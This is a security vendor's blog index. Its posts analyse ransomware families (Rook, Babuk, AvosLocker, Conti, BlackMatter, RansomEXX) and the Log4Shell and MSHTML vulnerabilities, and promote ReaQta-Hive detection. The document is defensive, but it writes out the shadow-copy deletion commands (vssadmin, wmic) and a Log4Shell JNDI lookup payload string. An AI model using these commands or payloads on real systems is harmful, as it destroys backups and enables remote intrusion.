Featured

The arrival of Windows 11, seamlessly supported by ReaQta

Microsoft has made Windows 11 operating system available for new machines since October 5, 2021 and having the Windows 11 ISO download go-live at the same time. This means that anyone can update their existing machine without waiting for a prompt or choose to do a complete fresh install by themselves. According to a note in the Microsoft Document, Microsoft has also accelerated the offering of Windows 11 to eligible devices.

Through Microsoft’s own machine learning processes, it will automatically determine if a system can handle a Windows 11 upgrade The minimum system requirements can be found here.  

Windows 11 system requirements

Should the specifications not be met, the Operating System parts for upgrade will not arrive, as determined by Microsoft’s machine learning processes. Machines that do not meet the requirements for upgrade will continue to function with Windows 10, with the support lifecyle ending on October 14th, 2025. This will be the 10 years mark since the operating system was first introduced. 

New call-to-action

For those who are unsure if your PC can run Windows 11, please download the PC Health Check app to find out.

Does ReaQta Support Windows 11?

At ReaQta, we have made certain that our customers will be supported on Windows 11 from day one, out of the box, extending ReaQta’s extensive security suite to our customers.

ReaQta agent running on Windows 11 Operating System

ReaQta Windows agent, version 3.6.1 and above, fully supports Windows 11, providing the same security and performance coverage on Windows 11 as on Windows 10. For devices with an older version of ReaQta agent, please upgrade the agent prior to Windows 11 upgrade to be supported. 

New call-to-action

Rook Ransomware (RaaS): The latest kid on the block with an attitude.

Rook, the latest kid on the block for ransomware operations, first appeared on VirusTotal on 26 November 2021. Since its discovery, Rook has claimed its victims across verticals like Banking, Finance, Technology and Aerospace and they have been announced on their TOR site. Like most ransomware operations, Rook utilizes a ‘double extortion’ approach to force its victims into payment. The stolen data is then displayed as proof of compromise, with accompanying information on the total amount of data stolen.

(Rook Tor Site)

(Victim’s compromised data is displayed on the TOR site)
Analyzing Rook

When executed, Rook encrypts all files, deletes backups via vssadmin.exe and removes itself from the compromised machine. It then leaves a ransom note.

(Rook ransom note)

Rook’s ransom notes state that compromised victims should contact the group within 3 days for the ransom amount to be subject to a “50% discount”. However, if this condition is not met, the company’s files will be leaked onto their onion network. Contact to the Rook team can be established via e-mail (rook@onionmail.org; securityRook@onionmail.org) or via the TOR browser link. The group also warns that should external help via software or third party assistance be used for decryption and restoration, the private key may be damaged, which would consequently lead to a total loss of data. 

New call-to-action


Running the attack

Upon the execution of the Rook ransomware, ReaQta-Hive autonomously reconstructed the breach, providing complete visibility across attacker tactics and techniques.

(ReaQta-Hive’s Behavioural Tree showing the Rook ransomware)

The behavioral tree maps all processes and behaviors involved in the infection to Mitre’s Attack Tactics and Techniques. Rook ransomware also uses the vssadmin.exe delete shadows/all/quiet command to delete shadow backup volume, much like what we have seen from Babuk and Avaddon. While some threat actors do focus restoration prevention, ReaQta provides additional layered defense via Destra on the detections on the misuse of wmic.exe and vssadmin.exe.

(Rook is automatically stopped by ReaQta-Hive within seconds)

Within seconds of the infection, ReaQta was effectively able to prevent costly and tiresome business interruptions. Aside from just stopping the threat, ReaQta’s AI algorithms automatically terminated all malicious processes involved in the incident. The vassadmin.exe process is also automatically terminated once the threat has been neutralized. Thereafter, ReaQta-Hive closed off the alert, reducing extra actions needed to be taken by the security team.

New call-to-action

Cyber threats will only continue to rise globally, given that the returns on investment of such ransomware attacks has unfortunately been proven. The aftermath of such infections remain alarming as an organizations ‘crown jewels’ are seized, and sensitive data is encrypted. 

By default, all applications and platforms should be built with security in mind. This includes having security design in the organization’s processes in order to protect both the company and consumers’ data. Organizations should also conduct checks: Are the security solutions that they are utilizing able to keep up with the pace of threats today? Are employees in the know about potential threats that they encounter?

ReaQta-Hive’s customers stay protected from threats like Rook.

To learn more about what makes ReaQta unique, please visit Why ReaQta and apply for a demonstration.

Babuk Ransomware (RaaS): Back-up Deletion and how to stop it

Babuk ransomware was discovered in January 2021 and operated a ransomware-as-a-service (RaaS) model before shutting down its operations in April. The group’s modus operandi is much like other RaaS operations, compromising organizations via phishing attempts or vulnerability exploits such as those used by HAFNIUM to gain initial access. This is followed by exfiltration of sensitive data and encryption of key assets. A key focus for the group is to prevent any possibility of data recovery via the termination of ongoing applications and back-ups during exfiltration, which includes the deletion of Windows shadow copies and recycle bin.

Through its operations, the group has explicitly stated that they would not target hospitals, non-profit charities and schools, or any organizations with revenues less than USD4 million annually. Babuk has since shut down their operations, and have released full source codes of their ransomware builder and decryptor on a hacking forum.

New call-to-action

Analyzing Babuk

Upon execution, Babuk encrypts all files on the victim’s machine while deleting away backups, preventing file recovery and system restore. This is then followed by a ransom note with a link to the Babuk Tor site.

Babuk ransom note

Running the attack

ReaQta-Hive reconstructs the breach, providing complete details of attacker tactics.

ReaQta-Hive’s Behavioural Tree showing the Babuk ransomware

ReaQta-Hive is equipped with ransomware protection capabilities to prevent any potential data encryption on endpoints. Any ransomware behavior is automatically blocked upon detection to ensure that sensitive data is protected. 

vssadmin.exe delete shadows/all/quiet command is captured on the behavioral tree

There are several ways that ransomware malware developers can use as part of their backup prevention operation. The most common approach would be to delete Shadow Volume Copies, via vssadmin.exe Delete Shadows /All /Quiet command as captured on the behavioral tree. This command executes vssadmin.exe utility to quietly delete allShadow Volume Copies on the machine. Shadow Volume Copies, which are usually done daily, provides the ability for manual or automatic backups, or snapshots even when files are in use. This allows organizations to roll back Windows to a previous configuration should the need arise. Ransomware Groups such as Babuk design the ransomware with the ability to delete Shadow Volume copies upon an infection, preventing its usage to recover encrypted files.

“vssadmin.exe” delete shadows/all/quiet command via Command Prompt

Cyber criminals also use wmic.exe shadowcopy delete to delete away Shadow Copies. While taking into account the varied mechanisms for backup deletion, ReaQta uses DeStra to monitor for vssadmin.exe and wmic.exe activities. DeStra, also known as Detection Strategy, is a real-time scripting engine that allows security operators to write custom detection and response rules, tailored to the needs and requirements of businesses. Should such techniques be employed, DeStra provides real-time alerts to the IT security teams and prevents the deletion of the backups via the termination of the vssadmin and wmic commands. 

DeStra detection for process “vssadmin.exe” and “wmic.exe”

ReaQta-Hive autonomously stops Babuk in very early attack stages, effectively mitigating business interruptions. ReaQta’s AI automatically terminated all malicious processes and prevented the threat within seconds before closing the alert to reduce any additional actions required of security teams.

Babuk is automatically stopped by ReaQta-Hive within seconds

As ransomware attacks become more prevalent in today’s threat landscape, organizations should adopt adequate and necessary security measures to future-proof their businesses. 

New call-to-action

To learn more about what makes ReaQta unique, please visit Why ReaQta and apply for a demonstration.

Defend against Log4Shell exploits (CVE-2021-44228) with ReaQta-Hive

A previously unknown vulnerability, CVE-2021-44228 also dubbed Log4Shell, in Apache’s popular logging library, Log4j, was discovered to have been exploited in the wild for several days prior to the vulnerability being publicly disclosed on 9 December. Affected versions of Log4j include 2.0-beta9 to 2.15.0. The vulnerability, through a simple exploitation, provides an attacker with the ability to leverage the Java Naming and Directory Interface (JNDI) from wherever Log4j is used to initiate a request to a malicious server that they control. The simplicity of the exploit, and ubiquity of Log4j’s use in applications, allows for widespread attacks across the Internet. While the exploit is exceedingly simple to execute, additional post-exploitation activity is required for an attacker to establish a foothold on targeted networks. ReaQta Hive will provide visibility into unexpected behavior of any application leveraging Log4j, and will detect the malicious techniques necessary for post-exploitation behavior.

New call-to-action

CVE-2021-44228 exists within Log4j’s feature enabling the use of JNDI. JNDI allows a java application to look up resources with names. In particular, it allows the use of a service provider interface that can then allow the use of a directory service such as LDAP. As affected versions of Log4j will evaluate a value expression in Java that is sent as logged data, such as ${object.property}, an attacker can include a JNDI lookup that includes a request to a directory or naming service within a value expression. For example, modifying their user agent string (commonly logged by web services) to a value expression, an attacker can trigger Log4j to initiate a request to a server controlled by the attacker. 

An often used example in public discussions of CVE-2021-44228 include triggering a connection to an attacker controlled LDAP server. For this, all that is needed is to include LDAP request in a string representing a value expression such as ${jdni:ldap://<host>:1389/malicious}. This string then needs to be processed along with any text that is handled by Log4j. Once Log4j handles the data, the value expression will be evaluated with eventually the LDAP request initiated. 

New call-to-action

The popularity of Log4j with services ranging from web or desktop applications to database or indexing services, provides an enormous attack surface on the Internet for attackers to target. The simplicity of exploitation, for example simply initiating HTTP requests with modified user agent strings to any web service, allows attackers to easily scale out attacks across the Internet. 

Still, however, an attacker is not finished with establishing a foothold upon successful exploitation. For this the affected server leveraging Log4j must be able to initiate an outbound request to the attacker-controlled server thereby delivering payloads for additional stages of the attack-chain. The exploit can also be used for other arbitrary remote command execution, but other vectors after exploitation would require more knowledge of the targeted environment.The additional requirements force an attacker to conduct activity that would be visible to any effective EDR solution.

Identify attacks with ReaQta-Hive

With ReaQta Hive, the use of the exploit to push any connection attempt to a malicious server would show unexpected network activity from the vulnerable application using affected versions of Log4j.

For example, exploiting a desktop application to contact a malicious LDAP server will show the application establishing a LDAP connection in ReaQta Hive’s telemetry. But follow-on activity required by the attacker does not change, and execution of malicious payloads on targeted servers or leveraging techniques and procedures for post-exploitation means the detection and remediation capabilities are not evaded.

CVE-2021-44228 will certainly remain a widespread problem for the foreseeable future. The number of applications which leverage Log4j is enormous, and additional vulnerable applications will likely continue to be publicly disclosed. However, there are a number of significant mitigations aside from developers upgrading to a fixed version of Log4j, currently version 2.17.0. Restricting unnecessary outbound ports at the firewall level can prevent initiation of malicious requests to external LDAP servers.

Monitoring endpoints and servers with an effective EDR platform which can both identify suspicious activity but also remediate upon detection will also prevent follow-on activity by attackers that attempt to exploit CVE-2021-44228.

IBM to Acquire ReaQta

An event of this magnitude requires more than my usual few lines on LinkedIn: we have entered into an agreement to be acquired by IBM.

For the past 7 years, we’ve worked hard to create an environment that fosters innovation and promotes new ideas, we’ve challenged the “usual way of doing things” and arrived at new concepts, ideas, workflows and technologies. Most of what we ended up creating emerged from our own constraints and desire to build a process that was efficient and more machine-driven, we never liked the idea of solving problems by hiding them behind the now proverbial RFoP (Room Full of People), we felt like it was cheating and wanted to make sure that all the tedious or time-sensitive tasks were taken over – to the maximum extent possible – by algorithms. For us, A.I. and Machine Learning were never buzzwords but a means to an end.

The result was a solution, ReaQta-Hive, that I personally loved from day one, as it embodied our core values: simplicity and automation. Building an “easy-to-use” business solution is definitely a difficult task. Finding the balance between how much data to show and how much you choose not to, in order to avoid information overload, is incredibly difficult. How do you select what’s important? How do you decide what isn’t? We’re dealing with sophisticated threats, where nothing is certain and everything is new, so drawing the line is often difficult. Our secret weapon has always been a team of incredibly gifted talent that we have carefully selected – and many times they have chosen us! – over the years. We’ve always made sure to keep the conversation going between all departments, and these exchanges have worked very well to plant the seeds for brilliant new ideas.

All those efforts eventually paid off, Gartner named us Cool Vendors in October 2020, we successfully managed several MITRE rounds, and our customer base continued to grow at a steady pace. Shortly thereafter, when the conversation with IBM began, the security team shared their ideas and strategy with us and everything aligned perfectly. Discussion after discussion it became clear that the direction we had taken, and the direction IBM had chosen, were really the same (net of a difference in scale factor, of course ;). And here we are today.

I’m excited about what’s coming next and also incredibly proud. The idea of participating in the creation of QRadar XDR, on such a large scale, is incredibly rewarding and is also a strong validation of the technology we have developed. I’m proud, because this is the result of a fantastic team that managed to remain cohesive, reliable, inventive and vibrant, even as the world was changing and we moved from bustling offices to the tranquility of our living rooms.

In IBM we will join forces with top talent from around the world, a unique opportunity for our team to be exposed to the best and most creative minds and continue to innovate faster than we ever thought possible. This is the beginning of an exciting new journey to change the way we think about cybersecurity, and I’m excited about what lies ahead!

Cover image shamelessly stolen from Christopher Meenan’s LinkedIn post.

Alberto Pelliccione

AvosLocker Ransomware (RaaS): A New Ransomware Group Emerges

AvosLocker recently made headlines as a new ransomware-as-a-service (RaaS) that commenced operations in June, represented by a purple bug brand logo. Operating based on a similar modus operandi to most RaaS, AvosLocker has started promoting its RaaS program via various forums on the dark web in its search for affiliates. AvosLocker’s primary mode of malware delivery is through spam email campaigns and online advertisements. After a successful compromise, AvosLocker then offers technical assistance to victims, providing support to recover the compromised systems. As seen on their Tor Network Site, AvosLocker uses 256-bit custom AES encryption and appends encrypted files with the extension .avos. Victims are then led to a landing page to begin the negotiations with the AvosLocker team.

AvosLocker Tor Site
Analyzing AvosLocker
AvosLocker ransom note

Upon execution, AvosLocker encrypts files on the victim’s machine and disables file recovery and system restore. A ransom note is left on the victim’s machine, which includes a link and a corresponding ID for access to the AvosLocker Tor site.

AvosLocker payment page

Once access is granted, AvosLocker provides a clean user interface that displays four main components: 

  1. Countdown Timer –  Displays time left before the ransom is doubled.
  2. Test Decryption –  A feature that allows victims to upload an encrypted sample file to check whether it can be successfully decrypted.
  3. Support Bot – A chat feature that gives victims the ability to interact with the AvosLocker group and is used for negotiations and payment support-related matters.
  4. Payment Information – A QR code is provided for payment address with the ransom currency denoted in cryptocurrency XMR (MONERO).
AvosLocker is paid via MONERO cryptocurrency

Subsequently, should the owner of the data choose to not pay the ransom, the AvosLocker group then puts the victim’s data up for sale via a press release.

AvosLocker Press Release Onion Service on the Tor network (captured October 20, 2021)

Within seconds of an infection, ReaQta-Hive is able to effectively reconstruct the complete breach, by providing complete details of attacker tactics.

New call-to-action


Running the attack

ReaQta-Hive’s Behavioural Tree showing the AvosLocker ransomware

ReaQta-Hive is equipped with ransomware protection capabilities to prevent any potential data encryption on endpoints. Any ransomware behaviour is automatically blocked upon detection to ensure that sensitive data is protected.

AvosLocker is automatically stopped by ReaQta-Hive within seconds

ReaQta-Hive was able to autonomously stop AvosLocker in very early attack stages, effectively mitigating any business interruptions. ReaQta’s AI automations terminated all malicious processes and stopped the threat within seconds, then closed off the alert to reduce any additional actions required of security teams.

New call-to-action

Ransomware attacks will only continue to surge globally. Organizations and its security leaders should already have security and mitigation plans in place to ensure that their sensitive data stays safe against any destructive malware.

To learn more about what makes ReaQta unique, please visit Why ReaQta and apply for a demonstration.

Conti Ransomware (RaaS): A New Wage-Paying Affiliate Model

The Cybersecurity and Infrastructure Security Agency (CISA) issued an advisory on Sep 22 around the CONTI Ransomware Group, providing detailed information regarding its exploits and affiliates. Together with the Federal Bureau of Investigation (FBI), they have seen Conti ransomware in over 400 attacks targeted on international enterprises. A PDF version of the advisory which contains a technical breakdown on the ransomware group and the mitigation steps is available here.

While operating as a ransomware-as-a-service model, Conti provides a different compensation structure as compared to typical affiliate models. According to CISA, Conti has devised a new wage-paying scheme for deployers of the ransomware, instead of only receiving a fractional return of proceeds from a successful compromise. While other RaaS models like LockBit2.0, BlackMatter and RansomEXX pay affiliates only when a breach is successful, Conti lowers the barriers for malicious insiders or disgruntled employees to launch ransomware. This greatly incentivises deviant behavior as potential insiders get paid at the onset, even if the attack is unsuccessful.

New call-to-action

Analyzing Conti
Conti Recovery Service Tor Site

Conti actors use a wide range of tools and methods to gain initial access into organizations, including the use of targeted spear phishing campaigns via custom crafted emails that contain malicious attachments or links, that often contain embedded scripts that are used to download or drop other malware. 

Other common methods of entry include stolen or weak Remote Desktop Protocol (RDP) credentials, phone calls, illegitimate software, other malware distribution networks and common vulnerabilities in external assets.

New call-to-action

According to a leaked Conti ransomware playbook, Conti actors exploit vulnerabilities such as “PrintNightmare” in unpatched assets to escalate privileges and move laterally across a victim’s network. Once the victim’s data has been stolen and encrypted, a double extortion technique is employed, demanding a ransom in exchange for the encrypted information. The victim is then threatened with the public release of the data should ransom be left unpaid.

Conti ransom note

Running the attack

ReaQta-Hive reconstructs an entire breach within seconds of an infection, by providing the full details of attack behaviours and techniques used.

ReaQta-Hive’s Behavioural Tree showing the Conti ransomware

Built with ransomware protection capabilities, ReaQta-Hive autonomously blocks ransomware once any ransomware behavior is exhibited to prevent any potential data encryption on the endpoint.

Conti is automatically stopped by ReaQta-Hive within seconds

ReaQta automatically stopped Conti within seconds, effectively mitigating the risks of any business interruptions and downtime. In addition to stopping the threat, ReaQta’s AI automations autonomously terminated all malicious processes and closed off the alert, reducing any extra actions required of the security team.

As ransomware attacks continue to grow to become one of the greatest security challenges for organizations globally, it is imperative that security leaders prioritize having mitigation plans ready so that swift action can be taken.

New call-to-action

Mitigations 

CISA recommends the following actions to reduce the risk of compromise by a Conti ransomware attack: 

  1. Ensure multi-factor authentication (MFA) is enabled across the organization.
  2. Ensure network segmentation via the usage of demilitarized zones (DMZs) and network traffic management controls are in place to prevent ingress and egress communications with known malicious IP addresses. Implement strong spam filters and conduct regular user training programs to enforce proper cyber hygiene.
  3. Ensure assets and software are routinely patched and updated.
  4. Use application allowlisting, preventing employees from installing illegitimate applications or unauthorized software which contravenes organization’s security policy. Implement execution prevention by disabling macro scripts from Microsoft Office files transmitted via email.
  5. Implement endpoint and detection response tools. Endpoint and detection response tools like ReaQta-Hive provide unparalleled visibility into the security status of endpoints and proactively secure organisations against malicious cyber actors.
  6. Control access to resources over the network, i.e restricting RDP.
  7. Ensure user accounts are properly configured for the right access controls and privilege rights and check logs to ensure account holders are legitimate users.

To learn more about what makes ReaQta unique, please visit Why ReaQta and apply for a demonstration.

Remote code execution vulnerability CVE-2021-40444 could become the next prolific cyber crime tool. Here’s how to stay ahead of such exploits.

A recently discovered exploit targeting a vulnerability in Microsoft’s internal browser engine, MSHTML, could become a prolific tool by cyber criminals in both targeted and wide-spread campaigns. CVE-2021-40444, a remote code execution vulnerability within Microsoft’s MSHTML browser engine was disclosed by Microsoft in a 07 September 2021 advisory1 but a malicious document involved in the exploit chain was discovered separately by security researchers a week prior. Public analysis of the document has led to the creation of multiple proof of concepts of the exploit now widely available. Despite the availability and ease of use of the exploit, any attack chain involving the exploit will generate noticeably anomalous behavior on the target machines.

According to Microsoft in a 15 September analysis of the exploit chain2, attacks involving the exploit were first observed in August 2021 in which emails posing as legal agreements led the victim to the malicious document on a file sharing site. Once the document was opened, a malicious JavaScript contained in another remotely hosted file was loaded via an external OLEObject relationship. The use of the exploit allowed the attack to circumvent Protected Mode in Microsoft Office, thus not requiring any additional interaction by the victim. From there, a remotely hosted CAB file containing a DLL posing as a INF file was downloaded, decompressed, then loaded, which in turn fetched a custom Cobalt Strike beacon loader. 

New call-to-action

The exploit itself is not technically challenging to deploy, and since the exploit was first made known to the broader public, several proof of concepts have been publicly released to include examples which makes customization relatively easy. As MSHTML is exposed in all Microsoft Windows environments, the exploit will remain effective on any unpatched system. Thus the availability and far reach of the exploit will likely make it a common tool among attackers conducting wide-spread malicious email campaigns. 

Analyzing the exploits

ReaQta analyzed the use of both the exploits found in the wild and proof of concepts available to the public, and found glaring red flags instantly among the telemetry. To include techniques known on the MITRE ATT&CK Framework such as T1129, Shared Modules.

ReaQta mapped the use of exploits to the MITRE ATT&CK Framework

In loading the module, the attack leverages Microsoft’s URL protocol handler but for control panel files, “.cpl://”, followed by a relative path traversal. Aside from the loading of the module, the use of .cpl:// in the URL is conspicuous and in particular its use in loading an INF file.

Of course, besides the very unusual activity around loading the malicious module, overall behaviour of Microsoft Office triggers numerous actions resembling known techniques mapped to the MITRE ATT&CK framework as well as spawning child processes.

The attack chain generates numerous events mapped to known techniques.

Even without a patch covering CVE-2021-40444, similar exploits — even against zero day vulnerabilities — cannot be executed without generating activity on target machines that is not highly anomalous thus detectable by an effective EDR protection. While attackers must first work to evade standard security features in the OS, such as additional warnings and restrictions for users like with Protected Mode, living off the land attacks require atypical use of legitimate tools and protocols available on the target machine. Additionally, the attack cycle does not end with successful exploitation of CVE-2021-40444. The attackers must still conduct follow-on activity to gain wider access to the target’s network.

New call-to-action

In-depth monitoring and threat detailing with ReaQta-Hive

ReaQta-Hive is designed to detect such activity immediately, but agents can more specifically detail the threat through the use of ReaQta’s DeStra engine. The DeStra engine allows for an additional layer of monitoring capabilities, allowing blue teams to craft simple yet sophisticated correlations based on the insights of the HIVE agents. While exploits against CVE-2021-40444 already trigger alerts in HIVE, a DeStra rule can mark the specific attacks in an alert. In this case matching the observed user agent in the HTTP request for the second stage payload (“Microsoft Office Discovery Protocol”) or matching the use of .cpl:// with a relative path traversal in the command line of an event.

References:

[1] ​​Microsoft. 2021. “Microsoft MSHTML Remote Code Execution Vulnerability.” Microsoft Security Response Center.

[2]Microsoft. 2021. “Analyzing attacks that exploit the CVE-2021-40444 MSHTML vulnerability.” Microsoft Threat Intelligence Center.

To learn more about what makes ReaQta unique, please visit Why ReaQta and apply for a demonstration.

BlackMatter Ransomware: A New Ransomware-as-a-Service (RaaS)

Following the recent trend in ransomware affiliates, BlackMatter has emerged as the latest ransomware-as-service (RaaS). According to Threat Intelligence company Recorded Future, BlackMatter has announced that they have “incorporated in itself the best features of DarkSide, REvil, and LockBit” as mentioned in an interview. Black Matter cited the following inspirations from each of their partner programs: 

  • From REvil: The implementation of SafeMode was thought of as weak and not well thought through. BlackMatter then built upon this idea before thoroughly implementing it. They also implemented the PowerShell version of the ransomware variant.
  • From LockBit: BlackMatter drew on LockBit’s approach for the implementation of a codebase as well as other minute details.
  • From DarkSide: The idea of impersonation (namely, the encryptor’s ability to use the domain administrator’s account to encrypt shared drives with maximum rights) and the structure of the admin panel were borrowed.

With reference to the hacker blog, BlackMatter targets organisations with a revenue of $100 million and more, and minimally 500-15,000 hosts in the network. The threat actor has also disclosed that they will not be targeting industries such as healthcare and state institutions. BlackMatter actively advertises the purchase of network access into organizations, offering a price range of $3,000-$100,000, including a percentage of the potential ransom amount. This modus operandi is gaining notoriety, aligned with other threat actor groups like Lockbit 2.0. 

New call-to-action

Analyzing BlackMatter

BlackMatter Blog

BlackMatter breaches organizations via purchased network access. Once initial access is secured, the threat actor moves laterally to key value targets and exfiltrates sensitive data, thereafter deploying ransomware in a centralised fashion, for instance, via the Domain Controller onto every single endpoint. Upon execution, BlackMatter encrypts files on the victim’s machine in a matter of seconds, disabling file recovery and system restore, and leaving a ransom note on the victim’s machine.

BlackMatter ransom note

Aside from just leaving a ransom note, BlackMatter alters the background image of the machine and directs the instruction to the README.txt file. 

BlackMatter background image change

Running the attack
Within seconds of an infection, ReaQta-Hive reconstructs the breach, providing pertinent information related to the behaviours and techniques exhibited. 

ReaQta-Hive’s Behavioural Tree showing the BlackMatter ransomware

Leveraging ReaQta’s ransomware protection capabilities, ransomware is autonomously stopped once ransomware behaviour is detected, preventing potential data encryption on the endpoint.

BlackMatter is automatically stopped by ReaQta-Hive within seconds

In the case of BlackMatter, ReaQta was effective within seconds, effectively mitigating potential business disruptions and downtime. In addition to stopping the threat, ReaQta’s AI automatically terminated all malicious processes involved in the incident, thereafter closing off the alert and reducing extra actions needed to be taken by the security team.

As ransomware attacks become increasingly rampant, organizations should not treat such attacks as an afterthought but instead have mitigation plans devised and ready.

New call-to-action

Ways to defend against a ransomware attack

According to Gartner Analyst, Paul Webber, “organizations need to focus on preparation and early mitigation if they want to cut losses to ransomware.” This mitigation strategy mentioned by Gartner covers the following six points:

  1. Perform initial ransomware assessments. Engage risk assessments and penetration tests to determine your organization’s attack surface and present state of security readiness in terms of tools, processes and skills to mitigate attacks.
  2. Ensure ransomware governance. Processes and execution contingency plans need to be in place to ensure swift response in the event of an actual crisis. It is also imperative for key stakeholders to be involved in this preparation.
  3. Having operational readiness at all times. Routinely stress test security systems that are put in place to ensure ransomware activities can be detected and prevented. Incorporate incident response scenarios into these ransomware response plans, so as to ensure that   the systems and processes put in place are not reliant on security systems that may be rendered unavailable in crisis time.
  4. Maintain backups for internal systems. Back up both data and all applications within the infrastructure. Ensure that backups are done frequently and cannot be compromised in a ransomware attack.
  5. Employ a Zero Trust security model. Restrict permissions and deny unauthorized access to devices. Remove local administrator rights from end users and block application installation for standard users. Instead, replace this with a centrally managed software distribution facility.
  6. Instill employee ransomware education. All employees should understand the ransomware threat and should be educated on the steps to take during a ransomware attack. 

To learn more about what makes ReaQta unique, please visit Why ReaQta and apply for a demonstration.

The resurgence of RansomEXX

RansomEXX recently gained notoriety due to its attack on Gigabyte, a well-known hardware manufacturer from Taiwan and an attack against Italy’s Lazio Region. The result of the first attack was the theft of 112GB of business data, and the second crippled the national COVID-19 Vaccination Registration Portal for 6 million people. Though it initially started out targeting Windows operating systems, RansomEXX has been seen targeting Linux servers via a separate Linux variant.

While RansomEXX has remained relatively low-profile over the past few years, its latest activities point to its potential resurgence now.

Analysing RansomEXX  

ReaQta’s analysis of RansomEXX found that – like most human-operated ransomware operations – RansomEXX breaches networks and organisations through emails, Spear Phishing, Bruteforce Remote Desktop Protocol (RDP) or stolen credentials.

Upon execution, RansomEXX encrypts files on the victim’s machine, thereafter disabling file recovery and system restore, leaving a ransom note on the victim’s machine.

RansomEXX ransom note

In some instances, RansomEXX operators have also made use of a double extortion method post-hit by threatening to leak victims’ data publicly if payment was not received.

ReaQta-Hive’s Behavioural Tree showing the RansomEXX ransomware

Within seconds of an infection, ReaQta-Hive gathers pertinent information to reconstruct the breach. At a glance, analysts are enabled to swiftly identify associated malicious behaviours and techniques applied by attackers and address the entire infection – including complete remediation and clean-ups.

Attack information is also mapped against the MITRE ATT&CK cyber kill chain framework, so that analysts can easily understand the current stage of a compromise.

RansomEXX is automatically stopped by ReaQta-Hive within seconds

With ReaQta’s real-time protection capabilities, threats like ransomware are automatically detected and stopped, preventing organisations from becoming the next victim of a ransomware attack. 

In the case of RansomEXX, ReaQta was effective within seconds, effectively mitigating hits that would have otherwise led to costly damages and sensitive data exfiltration. In addition to stopping the threat, ReaQta’s AI automatically terminates all malicious processes involved in the incident, thereafter closing off the alert and reducing extra actions needed to be taken by the security team.

AI & ML-powered solutions needed to stay ahead of attackers

Considering the rise of ransomware attacks, solutions that augment behavioral detection capabilities are increasingly becoming a necessity to detect and stop zero day and unknown threats that range from ransomware to file-less and in-memory attacks. 

Behavioural solutions, together with proactive threat hunting capabilities, are starting to become the centerpiece of any organization’s security strategy. This ensures that no dormant or hidden threats are allowed to lurk within your infrastructure. 

Relying on traditional protection methods alone today may no longer suffice, as visibility is limited, which increases the risks of a cyber breach.

Using unmatched levels of automation, AI & Machine Learning, ReaQta autonomously detects ransomware behaviour and actively handles the threat as they unfold so that organizations can stay protected against ransomware.

New call-to-action

ReaQta’s recommendations

  1. Cybersecurity awareness is imperative. Employees are the first line of defense, but they are also the most vulnerable. Organizations should make sure that employees are properly trained to flag anything that is potentially suspicious. All staff should be equipped to identify and flag possible phishing emails and be aware of how various business scams work.
  2. Enable 2-Factor Authentication(2FA)/ Multi-factor Authentication(MFA) as this protects your mails, cloud documents and VPN accesses. What is becoming increasingly obvious is that most attacks start off via email. This is a low cost option that is highly effective. For those leveraging Microsoft O365 or other platforms, do follow best practices guides that are readily available. This will strengthen the overall security posture of your organization.
  3. Ensure that Ransomware Behavior Protection policy is enabled. This will help prevent interruptions to your business.
  4. Constantly test your defences. Do not just focus on implementing security measures, but ensure that the entire process works from early detection to incident response. Should there be a lack of resources to provide for consistent threat monitoring and mitigation, ReaQta-MDR provides 24/7 round the clock security monitoring and will provide an immediate response when a new potential threat is being discovered.

To learn more about what makes ReaQta unique, please visit Why ReaQta and apply for a demonstration.

Close Bitnami banner
Bitnami